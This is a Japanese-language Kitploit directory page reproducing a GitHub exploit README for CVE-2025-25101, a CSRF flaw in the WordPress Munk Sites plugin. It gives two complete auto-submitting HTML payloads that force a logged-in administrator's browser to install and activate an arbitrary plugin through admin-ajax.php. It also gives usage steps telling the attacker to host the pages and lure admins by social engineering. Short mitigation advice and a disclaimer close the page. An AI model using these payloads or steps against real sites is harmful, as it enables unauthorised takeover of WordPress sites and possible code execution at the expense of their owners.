Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-25101 — WordPress Munk Sites plugin <= 1.0.7 - CSRF による任意のプラグインインストールの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-25101
脆弱性分析エクスプロイトウェブアプリケーション悪用フィッシングソーシャルエンジニアリング学習と教育
GitHubnxploited/cve-2025-25101

CVE-2025-25101

WordPress Munk Sites plugin <= 1.0.7 - CSRF による任意のプラグインインストールの脆弱性

リポジトリを見る
1131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚀 CVE-2025-25101 - WordPress Munk Sites プラグイン <= 1.0.7 - CSRFによる任意のプラグインインストール

📌 概要

CVE-2025-25101 は、WordPress 用 MetricThemes Munk Sites プラグイン (バージョン 1.0.7 以下) における クロスサイトリクエストフォージェリ (CSRF) の脆弱性です。
この脆弱性により、認証されていない攻撃者 が 管理者を騙して任意のプラグインをインストールおよび有効化させ、潜在的に リモートコード実行 (RCE) や ウェブサイトの侵害 につながる可能性があります。

🛑 影響を受けるバージョン

  • Munk Sites プラグイン <= 1.0.7
  • WordPress プラグインが有効なすべてのバージョン

🛡️ セキュリティ評価 (CVSS スコア)

スコア深刻度バージョンベクター文字列
9.6🔥 CRITICAL3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 エクスプロイトの説明

🛠️ 脆弱性の仕組み:

Munk Sites プラグインの CSRF の欠陥 により、攻撃者はログイン中の WordPress 管理者 に、同意なしに任意の WordPress プラグインをインストールおよび有効化させることができます。
これは、CSRF トークン検証が欠如している 保護されていない admin-ajax.php リクエスト を悪用することで行われます。

📌 エクスプロイトの流れ:

  1. 攻撃者は CSRF ペイロードを含む悪意のあるウェブページを作成します。
  2. 被害者 (WordPress 管理者) が攻撃者のウェブページにアクセスします。
  3. エクスプロイトは WordPress にリクエストを静かに送信し、任意のプラグインをインストールおよび有効化します。
  4. 管理者の操作なしにプラグインがインストールおよび有効化されます。

💻 エクスプロイトコード

1️⃣ CSRF エクスプロイト - プラグインのインストール

このペイロードは被害者に hello-world プラグインをインストールさせます。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ CSRF エクスプロイト - プラグインの有効化

このペイロードは被害者に hello-world プラグインを有効化させます。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 使用方法

  1. 悪意のある HTML ファイル (install.html と activate.html) を攻撃者が管理するサーバーにホストします。
  2. ソーシャルエンジニアリングにより WordPress 管理者に install.html にアクセスさせます。
  3. プラグインがインストールされたら、activate.html にアクセスするように誘導します。
  4. hello-world プラグインが管理者の同意なしにインストールおよび有効化されます!

🚧 緩和策

🔒 WordPress サイトを保護する方法:

  • Munk Sites プラグインの最新バージョンにアップグレードする (パッチが利用可能な場合)。
  • Wordfence や Sucuri などの WordPress セキュリティプラグインを使用する ことで CSRF 試行をブロックします。
  • .htaccess や Nginx 設定のセキュリティルールを使用して、admin-ajax.php へのアクセスを制限する。
  • 認証され、許可されたユーザーのみがプラグインをインストールまたは有効化できるようにする。
  • wp_nonce_field() と check_admin_referer() を使用して CSRF 保護を実装する。

📜 免責事項

⚠️ このエクスプロイトは教育およびセキュリティ研究目的のみです。
⚠️ 明示的な許可なくシステムに対して不正に使用することは違法です。
⚠️ 作成者はこのコードの誤用について一切の責任を負いません。


⭐ サポートと貢献

この研究が価値あると感じたら、リポジトリに ⭐ スターを付けて、新しい脆弱性 を報告することで貢献してください。

作成者: Nxploit | Khaled Alenazi

ツールをダウンロード